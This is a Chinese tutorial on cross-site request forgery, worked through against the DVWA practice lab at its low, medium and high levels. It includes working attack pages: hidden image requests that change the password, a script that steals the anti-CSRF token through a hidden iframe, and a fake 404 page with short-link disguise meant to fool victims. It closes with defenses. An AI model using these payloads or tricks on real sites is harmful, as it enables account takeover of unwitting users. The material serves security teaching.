CSRF跨站请求伪造

简介

CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。

在没有关闭相关网页的情况下，点击其他人发来的CSRF链接，利用客户端的cookie直接向服务器发送请求。

DVWA测试

low级别

当你登录之后，在没有关闭网页的情况下，收到别人的链接。

http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=1&password_conf=1&Change=Change#

点击链接，会利用浏览器的cookie把密码改掉。

如果页面已经关掉，或者打开链接的浏览器不是登录网站的浏览器那么这个csrf的攻击是都没用的。

medium级别

Medium级别的代码检查是否包含HTTP_REFERER（http包头的Referer参数的值，表示来源地址），是否包含SERVER_NAME（http包头的Host参数，表示要访问的主机名），通过这种机制抵御CSRF攻击。

制作攻击页面，将页面部署在服务器上，这样就会有Referer，直接点击链接的请求是没有refer的。

<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=1&password_conf=1&Change=Change#" border="0" style="display:none;"/>

<h1>404<h1>
<h2>page not found.<h2>

high级别

High级别的代码加入了Anti-CSRF token机制，用户每次访问改密页面时，服务器会返回一个随机的token，向服务器发起请求时，需要提交token参数，而服务器在收到请求时，会优先检查token，只有token正确，才会处理客户端的请求。

页面中要先获取token

<script type="text/javascript">
  function attack()
  {
    document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
    document.getElementById("transfer").submit(); 
  }
</script>

<iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>

<body onload="attack()">
  <form method="GET" id="transfer" action="http://127.0.0.1/dvwa/vulnerabilities/csrf">
    <input type="hidden" name="password_new" value="123">
    <input type="hidden" name="password_conf" value="123">
    <input type="hidden" name="user_token" value="">
    <input type="hidden" name="Change" value="Change">
  </form>
</body>

CSRF伪装

生成短连接，可以伪装url，防止根据链接看出内容

构造攻击页面，把网页部署好，然后链接发给其他人，当其他人点击链接的时候，会显示404，这时候会以为点了一个无效的链接。但是其中的img的src会请求一次。

<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=1&password_conf=1&Change=Change#" border="0" style="display:none;"/>

<h1>404<h1>
<h2>page not found.<h2>

防御

检测Referer

Anti-CSRF token机制

业务上要求用户输入原始密码（简单粗暴），攻击者在不知道原始密码的情况下，无论如何都无法进行CSRF攻击。